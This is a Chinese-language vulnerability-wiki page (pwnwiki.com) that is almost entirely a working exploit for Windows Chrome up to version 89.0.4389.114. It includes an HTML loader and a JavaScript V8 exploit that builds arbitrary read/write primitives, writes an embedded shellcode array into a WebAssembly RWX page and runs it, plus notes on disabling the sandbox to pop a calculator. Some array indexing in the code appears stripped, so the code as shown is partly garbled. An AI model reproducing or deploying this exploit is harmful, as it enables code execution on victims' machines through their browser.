pwnwiki.com
,
前提条件
仅支持Windows Chrome
EXP
exploit.html
<script src="exploit.js"></script>
exploit.js
var wasm_code = new Uint8Array(0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf0 = val; return BigInt(u64_buf0) + (BigInt(u64_buf1) << 32n); } function itof(val) { u64_buf0 = Number(val & 0xffffffffn); u64_buf1 = Number(val >> 32n); return f64_buf0; } const _arr = new Uint32Array(2**31); function foo(a) { var x = 1; x = (_arr0 ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = 1.1, 1.2, 1.3; return arr, cor; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x0; var cor = x1; const idx = 6; arridx+10 = 0x4242; function addrof(k) { arridx+1 = k; return ftoi(cor0) & 0xffffffffn; } function fakeobj(k) { cor0 = itof(k); return arridx+1; } var float_array_map = ftoi(cor3); var arr2 = itof(float_array_map), 1.2, 2.3, 3.4; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr21 = itof((2n << 32n) + addr - 8n); return (fake0); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr21 = itof((2n << 32n) + addr - 8n); fake0 = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcodei, true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("+ Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = 3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957; copy_shellcode(rwx_page_addr, shellcode); f();
警告
使用该漏洞需要关闭沙箱环境,如果不关闭沙箱会提示status_access_violation
或者内存错误
关闭沙箱可以弹出计算器
版本
Chrome <=89.0.4389.114
免费、自由、人人可编辑的漏洞库--PwnWiki.com